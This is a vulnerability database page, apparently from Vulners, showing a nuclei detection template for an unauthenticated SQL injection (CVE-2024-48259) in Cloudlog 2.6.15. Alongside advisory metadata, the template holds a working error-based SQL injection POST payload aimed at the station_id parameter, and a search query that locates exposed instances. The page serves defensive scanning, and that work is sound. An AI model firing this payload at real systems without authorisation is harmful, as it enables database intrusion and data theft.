Lucene search
K

Cloudlog - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Cloudlog 2.6.15 has SQL injection via unsanitized input in oqrs.php request_form, enabling arbitrary SQL via station_id or callsign.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-48259
14 Oct 202418:20
circl
CNNVD
Cloudlog 安全漏洞
14 Oct 202400:00
cnnvd
CVE
CVE-2024-48259
14 Oct 202400:00
cve
Cvelist
CVE-2024-48259
14 Oct 202400:00
cvelist
NVD
CVE-2024-48259
14 Oct 202415:15
nvd
Positive Technologies
PT-2024-33061
14 Oct 202400:00
ptsecurity
RedhatCVE
CVE-2024-48259
23 May 202509:01
redhatcve
Vulnrichment
CVE-2024-48259
14 Oct 202400:00
vulnrichment
id: CVE-2024-48259

info:
  name: Cloudlog - SQL Injection
  author: s4e-io
  severity: high
  description: |
    Cloudlog 2.6.15 contains a SQL injection caused by unsanitized input in oqrs.php request_form, letting attackers execute arbitrary SQL commands via station_id or callsign, exploit requires sending crafted request.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to the latest version of Cloudlog where this issue is fixed, or sanitize inputs properly.
  reference:
    - https://chiggerlor.substack.com/p/unauthenticated-sql-injection-in-9a3
    - https://github.com/magicbug/Cloudlog
    - https://nvd.nist.gov/vuln/detail/CVE-2024-48259
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-48259
    epss-score: 0.0087
    epss-percentile: 0.54406
    cwe-id: CWE-89
    cpe: cpe:2.3:a:magicbug:cloudlog:2.6.15:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: magicbug
    product: cloudlog
    fofa-query: "Login - Cloudlog"
  tags: cve,cve2024,cloudlog,sqli,vuln,unauth

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /index.php/oqrs/request_form HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        station_id=1 AND (SELECT 2469 FROM(SELECT COUNT(*),CONCAT(0x7162716b71,md5({{num}}),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "A Database Error Occurred", "{{md5({{num}})}}")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 500'
        condition: and
# digest: 490a00463044022042fb4a8b5f982dabf2db68c4c39d3e6d004026899f4f959172a2ae3f3a04e8f002202e136c6f5dbb075cde5971f46db4b3ec4dd307d41c0cd201e9645155d99b816c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 May 2026 02:07Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.17.3
EPSS0.0087
SSVC
12